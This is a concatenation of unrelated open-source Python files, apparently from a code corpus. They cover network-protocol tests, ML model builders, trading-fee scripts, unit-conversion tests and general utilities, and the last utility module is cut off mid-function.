deferred(tnet.iut1.nse.network_number_is)
# TD sees same traffic as sniffer2
tnet.td.start_state.success()
# network 1 sees router from 1 to 2
tnet.sniffer1.start_state.doc("1-1-0") \
.receive(NetworkNumberIs,
nniNet=1,
nniFlag=1,
).doc("1-1-1") \
.success()
# network 2 sees router from 2 to 1
tnet.sniffer2.start_state.doc("1-2-0") \
.receive(NetworkNumberIs,
nniNet=2,
nniFlag=1,
).doc("1-2-1") \
.success()
# network 3 sees nothing, message isn't routed
tnet.sniffer3.start_state.doc("1-3-0") \
.timeout(10).doc("1-3-1") \
.success()
# run the group
tnet.run()
def test_2(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_2")
# create a network
tnet = TNetwork1()
# test device broadcasts a request for the network number
s211 = tnet.td.start_state.doc("2-1-0") \
.send(WhatIsNetworkNumber(
destination=LocalBroadcast(),
)).doc("2-1-1") \
# test device sees both responses
both = s211 \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=1,
).doc("2-1-2-a") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("2-1-2-b") \
# allow the two packets in either order
s211.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("2-1-2-c") \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=1,
next_state=both,
).doc("2-1-2-d") \
# fail if anything is received after both packets
both.timeout(3).doc("2-1-3") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
def test_3(self):
"""Test broadcasts from a router."""
if _debug: TestNetworkNumberIs._debug("test_3")
# create a network
tnet = TNetwork2()
# tell the IUT to send what it knows
deferred(tnet.iut1.nse.network_number_is)
# TD sees same traffic as sniffer2
tnet.td.start_state.success()
# network 1 sees router from 1 to 2
tnet.sniffer1.start_state.doc("3-1-0") \
.receive(NetworkNumberIs,
nniNet=1,
nniFlag=1,
).doc("3-1-1") \
.success()
# network 2 sees nothing
tnet.sniffer2.start_state.doc("3-2-0") \
.timeout(10).doc("3-2-1") \
.success()
# network 3 sees nothing
tnet.sniffer3.start_state.doc("3-3-0") \
.timeout(10).doc("3-3-1") \
.success()
# run the group
tnet.run()
def test_4(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_4")
# create a network
tnet = TNetwork2()
def iut1_knows_net(net):
assert net in tnet.iut1.nsap.adapters
# test device sends request, receives one response
tnet.td.start_state.doc("4-1-0") \
.call(iut1_knows_net, None).doc("4-1-1") \
.send(WhatIsNetworkNumber(
destination=LocalBroadcast(),
)).doc("4-1-2") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("4-1-3") \
.timeout(3).doc("4-1-4") \
.call(iut1_knows_net, 2).doc("4-1-5") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
def test_5(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_5")
# create a network
tnet = TNetwork2()
# tell the IUT2 to send what it knows
deferred(tnet.iut2.nse.network_number_is)
# test device receives announcement from IUT2, requests network
# number from IUT1, receives announcement from IUT1 with the
# network learned
tnet.td.start_state.doc("5-1-0") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("5-1-1") \
.send(WhatIsNetworkNumber(
destination=Address(5),
)).doc("5-1-2") \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=0,
).doc("5-1-3") \
.timeout(3).doc("5-1-4") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
|
DQM/SiStripMonitorPedestals/python/SiStripMonitorRawData_cfi.py | ckamtsikis/cmssw | 852 | 12715773 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
RawDataMon = DQMEDAnalyzer('SiStripMonitorRawData',
OutputMEsInRootFile = cms.bool(False),
DigiProducer = cms.string('siStripDigis'),
OutputFileName = cms.string('SiStripRawData.root')
)
|
api/curve/v1/models/__init__.py | QiliangFan/Baidu-Curve | 478 | 12715795 | # -*- coding: utf-8 -*-
"""
Models
~~~~
:copyright: (c) 2017-2018 by Baidu, Inc.
:license: Apache, see LICENSE for more details.
"""
from .data_abstract import DataAbstract
from .raw import Raw
from .point import Point
from .thumb import Thumb
from .band_item import BandItem
from .user import User
|
demos/cta_step_by_step/04_DataKit.py | NoTravel/wtpy | 164 | 12715803 | <gh_stars>100-1000
# 1、配置04_DataKit/config.ini
# 2、python 04_DataKit.py
# 3、程序自动生成Common/commodities.json Common/contracts.json
# 4、请注意simnow只能在开盘时间运行
# todo: statemonitor.json 硬编码无法移到配置文件目录中,等群主发功
# todo: 不支持 code:"CFFEX.T.HOT"或 code:"CFFEX.T",等群主发功
from wtpy import WtDtEngine
if __name__ == "__main__":
#创建一个运行环境,并加入策略
env = WtDtEngine()
env.initialize("./04_DataKit/dtcfg.json", "./04_DataKit/logcfgdt.json")
env.run()
kw = input('press any key to exit\n') |
models/image_models_test.py | google-research/pathdreamer | 115 | 12715890 | <reponame>google-research/pathdreamer
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pathdreamer.models.image_models."""
import itertools
from absl.testing import parameterized
from pathdreamer.models import image_models
import tensorflow as tf
class ImageModelsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests on the image_models file."""
@parameterized.parameters(list(itertools.product((1, 2), (128, 256), (41,))))
def test_model_output(self, batch_size, image_size, channels):
"""Tests that encoder / decoder outputs correct shapes."""
test_input = tf.random.uniform(
(batch_size, image_size, image_size, channels),
maxval=1,
dtype=tf.int32)
test_input = tf.cast(test_input, tf.float32)
hidden_dims = 8
test_encoder = image_models.ResNetEncoder(image_size=image_size,
hidden_dims=hidden_dims,
resnet_version='50')
test_decoder = image_models.ResNetDecoder(
image_size=image_size,
hidden_dims=hidden_dims,
output_dim=channels,
resnet_version='50')
test_encoder_output, test_skip = test_encoder(test_input)
# Encoder output should be a vector of shape (N, output_dim).
self.assertEqual(test_encoder_output.shape[0], batch_size)
self.assertLen(test_encoder_output.shape, 2)
tiled_encoder_output = test_encoder_output[:, None, None, :]
test_decoder_output = test_decoder(tiled_encoder_output, test_skip)
# Decoder output should be equal to input shape.
self.assertEqual(test_decoder_output.shape, test_input.shape)
if __name__ == '__main__':
tf.test.main()
|
script-get_fees.py | dthevenin/pycryptobot | 1,447 | 12715917 | <filename>script-get_fees.py
from models.PyCryptoBot import PyCryptoBot
from models.exchange.binance import AuthAPI as BAuthAPI
from models.exchange.coinbase_pro import AuthAPI as CAuthAPI
# Coinbase Pro fees
app = PyCryptoBot(exchange='coinbasepro')
api = CAuthAPI(app.getAPIKey(), app.getAPISecret(), app.getAPIPassphrase(), app.getAPIURL())
#print (api.getTakerFee())
#print (api.getTakerFee('BTC-GBP'))
#print (api.getMakerFee())
#print (api.getMakerFee('BTC-GBP'))
#print (api.getFees('BTCGBP'))
#print (api.getFees())
print (app.getMakerFee())
print (app.getTakerFee())
# Binance fees
app = PyCryptoBot(exchange='binance')
api = BAuthAPI(app.getAPIKey(), app.getAPISecret(), app.getAPIURL())
#print (api.getTakerFee())
#print (api.getTakerFee('BTCGBP'))
#print (api.getMakerFee())
#print (api.getMakerFee('BTCGBP'))
#print (api.getFees('BTCGBP'))
#print (api.getFees())
print (app.getMakerFee())
print (app.getTakerFee()) |
pycls/core/builders.py | KelvinYang0320/nas-without-training | 385 | 12715998 | <filename>pycls/core/builders.py<gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Model and loss construction functions."""
import torch
from pycls.core.config import cfg
from pycls.models.anynet import AnyNet
from pycls.models.effnet import EffNet
from pycls.models.regnet import RegNet
from pycls.models.resnet import ResNet
from pycls.models.nas.nas import NAS
from pycls.models.nas.nas_search import NAS_Search
from pycls.models.nas_bench.model_builder import NAS_Bench
class LabelSmoothedCrossEntropyLoss(torch.nn.Module):
"""CrossEntropyLoss with label smoothing."""
def __init__(self):
super(LabelSmoothedCrossEntropyLoss, self).__init__()
self.eps = cfg.MODEL.LABEL_SMOOTHING_EPS
self.num_classes = cfg.MODEL.NUM_CLASSES
def forward(self, logits, target):
pred = logits.log_softmax(dim=-1)
with torch.no_grad():
target_dist = torch.ones_like(pred) * self.eps / (self.num_classes - 1)
target_dist.scatter_(-1, target.unsqueeze(-1), 1 - self.eps)
return (-target_dist * pred).sum(dim=-1).mean()
# Supported models
_models = {
"anynet": AnyNet,
"effnet": EffNet,
"resnet": ResNet,
"regnet": RegNet,
"nas": NAS,
"nas_search": NAS_Search,
"nas_bench": NAS_Bench,
}
# Supported loss functions
_loss_funs = {
"cross_entropy": torch.nn.CrossEntropyLoss,
"label_smoothed_cross_entropy": LabelSmoothedCrossEntropyLoss,
}
def get_model():
"""Gets the model class specified in the config."""
err_str = "Model type '{}' not supported"
assert cfg.MODEL.TYPE in _models.keys(), err_str.format(cfg.MODEL.TYPE)
return _models[cfg.MODEL.TYPE]
def get_loss_fun():
"""Gets the loss function class specified in the config."""
err_str = "Loss function type '{}' not supported"
assert cfg.MODEL.LOSS_FUN in _loss_funs.keys(), err_str.format(cfg.TRAIN.LOSS)
return _loss_funs[cfg.MODEL.LOSS_FUN]
def build_model():
"""Builds the model."""
return get_model()()
def build_loss_fun():
"""Build the loss function."""
if cfg.TASK == "seg":
return get_loss_fun()(ignore_index=255)
else:
return get_loss_fun()()
def register_model(name, ctor):
"""Registers a model dynamically."""
_models[name] = ctor
def register_loss_fun(name, ctor):
"""Registers a loss function dynamically."""
_loss_funs[name] = ctor
|
src/notifier/script_notifier.py | Umiiii/chiadog | 503 | 12715999 | # std
import logging
import os
import subprocess
from typing import List
# project
from . import Notifier, Event
class ScriptNotifier(Notifier):
def __init__(self, title_prefix: str, config: dict):
logging.info("Initializing script notifier.")
super().__init__(title_prefix, config)
try:
self.script_path = config["script_path"]
except KeyError as key:
logging.error(f"Invalid config.yaml. Missing key: {key}")
if self.script_path:
if os.path.isfile(self.script_path):
if os.access(self.script_path, os.X_OK) is False:
logging.error(f"Invalid script path. File is not executable: {self.script_path}")
else:
logging.error(f"Invalid script path. File does not exist: {self.script_path}")
self.script_path = None
def send_events_to_user(self, events: List[Event]) -> bool:
if self.script_path is None:
return False
for event in events:
if event.type in self._notification_types and event.service in self._notification_services:
subprocess.run([str(self.script_path), event.priority.name, event.service.name, event.message])
return True
|
tests/utils.py | PSSF23/graspologic | 148 | 12716017 | # Copyright (c) Microsoft Corporation and contributors.
# Licensed under the MIT License.
import os
def data_file(filename):
return os.path.join(os.path.dirname(__file__), "test_data", filename)
|
src/garage/sampler/__init__.py | blacksph3re/garage | 1,500 | 12716048 | """Samplers which run agents in environments."""
# yapf: disable
from garage.sampler._dtypes import InProgressEpisode
from garage.sampler._functions import _apply_env_update
from garage.sampler.default_worker import DefaultWorker
from garage.sampler.env_update import (EnvUpdate,
ExistingEnvUpdate,
NewEnvUpdate,
SetTaskUpdate)
from garage.sampler.fragment_worker import FragmentWorker
from garage.sampler.local_sampler import LocalSampler
from garage.sampler.multiprocessing_sampler import MultiprocessingSampler
from garage.sampler.ray_sampler import RaySampler
from garage.sampler.sampler import Sampler
from garage.sampler.vec_worker import VecWorker
from garage.sampler.worker import Worker
from garage.sampler.worker_factory import WorkerFactory
# yapf: enable
__all__ = [
'_apply_env_update',
'InProgressEpisode',
'FragmentWorker',
'Sampler',
'LocalSampler',
'RaySampler',
'MultiprocessingSampler',
'VecWorker',
'WorkerFactory',
'Worker',
'DefaultWorker',
'EnvUpdate',
'NewEnvUpdate',
'SetTaskUpdate',
'ExistingEnvUpdate',
]
|
lib/hachoir/core/language.py | 0x20Man/Watcher3 | 320 | 12716086 | <filename>lib/hachoir/core/language.py
import functools
from hachoir.core.iso639 import ISO639_2
@functools.total_ordering
class Language:
def __init__(self, code):
code = str(code)
if code not in ISO639_2:
raise ValueError("Invalid language code: %r" % code)
self.code = code
def __eq__(self, other):
if other.__class__ != Language:
return NotImplemented
return self.code == other.code
def __lt__(self, other):
if other.__class__ != Language:
return NotImplemented
return self.code < other.code
def __str__(self):
return ISO639_2[self.code]
def __repr__(self):
return "<Language '%s', code=%r>" % (str(self), self.code)
|
tests/pyunit/util/pyunit_convert_check.py | hyu-iot/gem5 | 765 | 12716103 | <filename>tests/pyunit/util/pyunit_convert_check.py
#!/usr/bin/env python3
#
# Copyright (c) 2021 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from m5.util import convert
def _ip(*args):
return (args[0] << 24) | (args[1] << 16) | (args[2] << 8) | args[3]
class ConvertTestSuite(unittest.TestCase):
"""Test cases for unit conversion"""
def test_toMetricFloat(self):
def conv(x):
return convert.toMetricFloat(x, 'value', 'X')
self.assertEqual(conv('42'), 42e0)
self.assertEqual(conv('42.5'), 42.5e0)
self.assertEqual(conv('42kX'), 42e3)
self.assertEqual(conv('42.5kX'), 42.5e3)
self.assertEqual(conv('42MX'), 42e6)
self.assertEqual(conv('42GX'), 42e9)
self.assertEqual(conv('42TX'), 42e12)
self.assertEqual(conv('42PX'), 42e15)
self.assertEqual(conv('42EX'), 42e18)
self.assertEqual(conv('42KiX'), 42 * 2**10)
self.assertEqual(conv('42MiX'), 42 * 2**20)
self.assertEqual(conv('42GiX'), 42 * 2**30)
self.assertEqual(conv('42TiX'), 42 * 2**40)
self.assertEqual(conv('42PiX'), 42 * 2**50)
self.assertEqual(conv('42EiX'), 42 * 2**60)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42KX')
self.assertRaises(ValueError, conv, '42kiX')
self.assertEqual(convert.toMetricFloat('42'), 42)
# Prefixes not allowed without a unit
self.assertRaises(ValueError, convert.toMetricFloat, '42k')
def test_toMetricInteger(self):
def conv(x):
return convert.toMetricInteger(x, 'value', 'X')
self.assertEqual(conv('42'), 42 * 10**0)
self.assertEqual(conv('42kX'), 42 * 10**3)
self.assertEqual(conv('42MX'), 42 * 10**6)
self.assertEqual(conv('42GX'), 42 * 10**9)
self.assertEqual(conv('42TX'), 42 * 10**12)
self.assertEqual(conv('42PX'), 42 * 10**15)
self.assertEqual(conv('42EX'), 42 * 10**18)
self.assertEqual(conv('42KiX'), 42 * 2**10)
self.assertEqual(conv('42MiX'), 42 * 2**20)
self.assertEqual(conv('42GiX'), 42 * 2**30)
self.assertEqual(conv('42TiX'), 42 * 2**40)
self.assertEqual(conv('42PiX'), 42 * 2**50)
self.assertEqual(conv('42EiX'), 42 * 2**60)
self.assertRaises(ValueError, conv, '42.1')
self.assertRaises(ValueError, conv, '42.1kX')
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42KX')
self.assertRaises(ValueError, conv, '42kiX')
self.assertEqual(convert.toMetricInteger('42'), 42)
# Prefixes not allowed without a unit
self.assertRaises(ValueError, convert.toMetricInteger, '42k')
def test_toBool(self):
conv = convert.toBool
self.assertEqual(conv('TRUE'), True)
self.assertEqual(conv('true'), True)
self.assertEqual(conv('t'), True)
self.assertEqual(conv('yes'), True)
self.assertEqual(conv('y'), True)
self.assertEqual(conv('1'), True)
self.assertEqual(conv('FALSE'), False)
self.assertEqual(conv('false'), False)
self.assertEqual(conv('f'), False)
self.assertEqual(conv('no'), False)
self.assertEqual(conv('n'), False)
self.assertEqual(conv('0'), False)
self.assertRaises(ValueError, conv, 'not a bool')
self.assertRaises(ValueError, conv, '2')
def test_toFrequency(self):
conv = convert.toFrequency
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42Hz'), 42)
self.assertEqual(conv('42kHz'), 42e3)
# Prefixes need a unit
self.assertRaises(ValueError, conv, '42k')
# Seconds isn't a valid unit unless using anyToFrequency.
self.assertRaises(ValueError, conv, '42s')
def test_toLatency(self):
conv = convert.toLatency
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42s'), 42.0)
# We allow prefixes for seconds.
self.assertEqual(conv('42ks'), 42e3)
# Prefixe need a unit
self.assertRaises(ValueError, conv, '42k')
# Hz shouldn't be converted unless using anyToLatency
self.assertRaises(ValueError, conv, '42Hz')
def test_anyToLatency(self):
conv = convert.anyToLatency
self.assertEqual(conv('42s'), 42.0)
# We currently allow prefixes for seconds.
self.assertEqual(conv('42ks'), 42e3)
self.assertEqual(conv('10Hz'), 0.1)
self.assertEqual(conv('1kHz'), 1e-3)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42')
def test_anyToFrequency(self):
conv = convert.anyToFrequency
self.assertEqual(conv('42kHz'), 42e3)
self.assertEqual(conv('0.1s'), 10.0)
self.assertEqual(conv('1ms'), 1000.0)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42')
def test_toNetworkBandwidth(self):
conv = convert.toNetworkBandwidth
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42bps'), 42.0)
self.assertEqual(conv('42kbps'), 42e3)
self.assertRaises(ValueError, conv, '42Kbps')
def test_toMemoryBandwidth(self):
conv = convert.toMemoryBandwidth
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42B/s'), 42.0)
self.assertEqual(conv('42MB/s'), 42 * 2 ** 20)
self.assertEqual(conv('42MiB/s'), 42 * 2 ** 20)
self.assertRaises(ValueError, conv, '42KB/s')
self.assertRaises(ValueError, conv, '42Mi')
def test_toMemorySize(self):
conv = convert.toMemorySize
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42B'), 42.0)
self.assertEqual(conv('42kB'), 42 * 2**10)
self.assertEqual(conv('42MB'), 42 * 2**20)
self.assertEqual(conv('42KiB'), 42 * 2**10)
self.assertEqual(conv('42MiB'), 42 * 2**20)
def test_toIpAddress(self):
conv = convert.toIpAddress
self.assertEqual(conv("255.255.255.255"), _ip(255, 255, 255, 255))
self.assertEqual(conv("1.2.3.4"), _ip(1, 2, 3, 4))
self.assertRaises(TypeError, conv, 0)
self.assertRaises(ValueError, conv, "0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.300")
self.assertRaises(ValueError, conv, "0.0.0.0.0")
def test_toIpNetmask(self):
conv = convert.toIpNetmask
self.assertEqual(conv("1.2.3.4/24"), (_ip(1, 2, 3, 4), 24))
self.assertEqual(conv("1.2.3.4/255.255.255.0"),
(_ip(1, 2, 3, 4), 24))
self.assertEqual(conv("1.2.3.4/0"), (_ip(1, 2, 3, 4), 0))
self.assertEqual(conv("1.2.3.4/0.0.0.0"),
(_ip(1, 2, 3, 4), 0))
self.assertRaises(ValueError, conv, "0.0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.0/")
self.assertRaises(ValueError, conv, "0.0.0.0/64")
def test_toIpWithPort(self):
conv = convert.toIpWithPort
self.assertEqual(conv("1.2.3.4:42"), (_ip(1, 2, 3, 4), 42))
self.assertRaises(ValueError, conv, "0.0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.0:")
self.assertRaises(ValueError, conv, "0.0.0.0:65536")
def test_toVoltage(self):
conv = convert.toVoltage
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42V'), 42)
self.assertEqual(conv('42kV'), 42e3)
def test_toCurrent(self):
conv = convert.toCurrent
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42A'), 42)
self.assertEqual(conv('42kA'), 42e3)
def test_toEnergy(self):
conv = convert.toEnergy
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42J'), 42)
self.assertEqual(conv('42kJ'), 42e3)
def test_temperature(self):
conv = convert.toTemperature
self.assertEqual(conv("1.0K"), 1.0)
self.assertEqual(conv("1.0mK"), 1.0e-3)
self.assertEqual(conv("0C"), 273.15)
self.assertEqual(conv("-1C"), 272.15)
self.assertRaises(ValueError, conv, "1.0")
self.assertRaises(ValueError, conv, "-1K")
self.assertEqual(conv("32F"), 273.15)
|
cooka/common/util.py | DataCanvasIO/Cooka | 222 | 12716156 | <filename>cooka/common/util.py
import datetime
import time
import six
from uuid import uuid4
import json
from json import JSONEncoder
import math
import re
from cooka.common import consts
from os import path as P
MAX_BUFFER_SIZE = 1024
UUID_CHARS = ("a", "b", "c", "d", "e", "f",
"g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s",
"t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5",
"6", "7", "8", "9", "A", "B", "C", "D", "E", "F", "G", "H", "I",
"J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V",
"W", "X", "Y", "Z")
def short_uuid():
uuid = str(uuid4()).replace('-', '')
result = ''
for i in range(0, 8):
sub = uuid[i * 4: i * 4 + 4]
x = int(sub, 16)
result += UUID_CHARS[x % 0x3E]
return result
def human_datetime(date=None):
if date is None:
date = datetime.datetime.now()
return date.strftime("%Y%m%d%H%M%S%f")
def human_std_datetime(date=None):
if date is None:
date = datetime.datetime.now()
return date.strftime("%Y-%m-%d %H:%M:%S")
def cut_suffix(file_name):
last_position = file_name.rfind('.')
if last_position > -1:
return file_name[:last_position]
else:
return file_name
def analyze_data_job_name(file_name, _datetime=None):
d = human_datetime(_datetime)
return f'job_analyze_{cut_suffix(file_name)}_{d}'
def predict_job_name(dataset_name, _datetime=None):
d = human_datetime(_datetime)
return f'job_predict_{cut_suffix(dataset_name)}_{d}'
def temporary_upload_file_path(filename):
return f'{consts.PATH_TMP_UPLOAD}/{short_uuid()}/{filename}'
def get_file_suffix(file_name):
last_position = file_name.rfind('.')
if last_position > -1:
return file_name[last_position:]
else:
raise NameError(f"File {file_name} has no suffix. ")
def human_data_size(value):
def r(v, unit):
return "%s%s" % (round(v, 2), unit)
if value < 1024 * 1024:
return r(value / 1024, "KB")
elif 1024 * 1024 < value <= 1024 * 1024 * 1024:
return r(value / 1024 / 1024, "MB")
else:
return r(value / 1024 / 1024 / 1024, "GB")
def get_now_datetime():
return datetime.datetime.now()
def get_now_long():
return round(time.time() * 1000)
def to_timestamp(d):
return round(d.timestamp()*1000)
class NaNEncoder(JSONEncoder):
def default(self, obj):
try:
_ = iter(obj)
except TypeError:
if isinstance(obj, float) and math.isnan(obj):
return "null"
elif isinstance(obj, datetime.datetime):
return to_timestamp(obj)
return JSONEncoder.default(self, obj)
def dumps(d, indent=4):
"""
防止生成Unicode
:param d:
:return:
"""
import six
if six.PY2:
return json.dumps(d, ensure_ascii=False, encoding='utf-8', indent=indent, cls=NaNEncoder)
else:
return json.dumps(d, ensure_ascii=False, indent=indent, cls=NaNEncoder)
def dumps_bytes(d):
"""
防止生成Unicode
:param d:
:return:
"""
str_data = dumps(d)
return to_bytes(str_data)
def loads(s):
"""
防止生成Unicode
:param s:
:return:
"""
d = json.loads(s)
return byteify(d)
def to_str(sv):
"""将unicode和python3中的字节转换成字符串。
Args:
sv(Union(bytes, unicode, object)): 字节、unicode或者其他类型的数据转换为字符串;
Returns:
str: 字符串数据。
"""
if six.PY2:
if isinstance(sv, unicode):
return sv.encode('utf-8')
else:
return str(sv)
else: # 在py3以及更高的版本中
if isinstance(sv, bytes):
return str(sv, encoding='utf-8')
else:
return str(sv)
def to_bytes(s):
"""将字符串转换为字节数组。
Args:
s (Union(str, unicode)): 需要转换为字节的数据,在python2中支持类型str和unicode;在py3中支持str。
Returns:
字节数据。
"""
if six.PY2:
# 在python2中字符串就是字节数组
if isinstance(s, unicode):
return s.encode('utf-8')
elif isinstance(s, str):
return s
else:
raise Exception("无法将类型%s转换为字节" % type(s).__name__)
else: # 在py3以及更高的版本中
if isinstance(s, str):
return bytes(s, encoding="utf-8")
elif isinstance(s, bytes):
return s
else:
raise Exception("无法将类型%s转换为字节" % type(s).__name__)
def byteify(s, encoding='utf-8'):
"""
把Dict中的Unicode转换为字符串
:param s:
:param encoding:
:return:
"""
if isinstance(s, dict):
r = {}
for k in s:
r[byteify(k)] = byteify(s[k])
return r
elif isinstance(s, list):
return [byteify(element) for element in s]
elif type(s).__name__ == 'unicode':
return s.encode(encoding)
else:
return s
def datetime_diff(end, start):
return round((end - start).total_seconds(), 2) # in seconds
def _divide(n1, n2):
r1 = int(n1 / n2)
r2 = n1 % n2
return r1, r2
def human_format_by_minute(seconds):
unit_day = 3600 * 24
unit_hour = 3600
unit_minute = 60
if seconds >= unit_day: # by hour
n_days, remain_seconds = _divide(seconds, unit_day)
n_hours, remain_seconds = _divide(remain_seconds, unit_hour)
n_minutes, remain_seconds = _divide(remain_seconds, unit_minute)
return f"{n_days}d {n_hours}h {n_minutes}m"
if seconds >= unit_hour: # by hour
n_hour, remain_seconds = _divide(seconds, unit_hour)
n_minutes, remain_seconds = _divide(remain_seconds, unit_minute)
return f"{n_hour}h {n_minutes}m"
elif seconds >= unit_minute:
n_minutes, remain_seconds = _divide(seconds, unit_minute)
return f"{n_minutes}m"
else:
return "<1m"
def datetime_diff_human_format_by_minute(end, start):
seconds = round((end - start).total_seconds(), 2) # in seconds
return human_format_by_minute(seconds)
def time_diff(end, start):
delta = end - start
return round(delta, 2) # in seconds
def tail(file_path, n=100):
""" Tail file.
Read file from tail using seek. Read 1024 chars every time and find .
Args:
file_path: a text file only
n:
Returns:
Known Issues:
1. n=1 may see nothing, please check is the file end with a ''
"""
with open(file_path, 'r') as f:
file_size = f.seek(0, 2) # seek tail
current_position = file_size
line_count = 0
first_line_position = 0
while current_position > 0:
if current_position < MAX_BUFFER_SIZE:
f.seek(0)
buffer_size = current_position
current_position = 0
else:
current_position = current_position - MAX_BUFFER_SIZE
f.seek(current_position)
buffer_size = MAX_BUFFER_SIZE
data = f.read(buffer_size)
data_len = len(data)
for i in range(data_len):
p = data_len - i - 1
if data[p] == '':
line_count = line_count + 1
if line_count == n:
first_line_position = current_position + p + 1 # does not include break
f.seek(first_line_position)
while True:
_d = f.readline()
if _d is not None and len(_d) > 0:
yield _d
else:
break
def readall(p):
with open(p, 'r') as f:
return f.read()
def read_text(p):
with open(p, 'r' , encoding='utf-8') as f:
return f.read()
def load(p):
return loads(readall(p))
def make_dataset_name(name):
"""Dataset name contains "letters, numbers, -, _" only, any other content will be replaced with "-"
"""
def may_replace(c):
if re.match("\w", c) is None:
if c == '-':
return c
else:
return "_"
else:
return c
return "".join([may_replace(c) for c in name])
def require_type(name, o, t):
if o is not None:
if not isinstance(o, t):
raise Exception("'%s'需要%s类型。" % (name, t.__name__))
def require_attr_not_none(o, name):
"""校验对象中的属性不能为空。
Args:
o:
name: 属性的名称。
Returns:
"""
if o is not None:
if getattr(o, name, None) is None:
raise Exception("对象=%s的属性'%s'不能为空。" % (str(o), name))
def require_list_non_empty(name, o):
"""校验数组不能为空。
Args:
name: 提示对象名称。
o: 数组对象。
Returns:
"""
if is_non_empty_list(o):
pass
else:
raise Exception("'%s' 不能为空。" % name)
def require_str_non_empty(str_obj, tips):
"""校验数组不能为空。
Args:
str_obj: 字符串对象。
tips: 为空时的提示信息。
Returns:
"""
if str_obj is None or len(str_obj) == 0:
raise Exception("'%s' 不能为空。" % tips)
def cast_type(o, _type):
if o is None:
return o
else:
if _type == int:
if not isinstance(o, int):
return int(o) # may raise error
else:
return o
if _type == float:
if not isinstance(o, float):
return float(o) # may raise error
else:
return o
elif _type == str:
return str(o)
else:
raise ValueError(f"Not supported convert type: {_type}")
def require_in_dict(_dict, key, _type=int, default=None):
v = _dict.get(key, default)
if v is None:
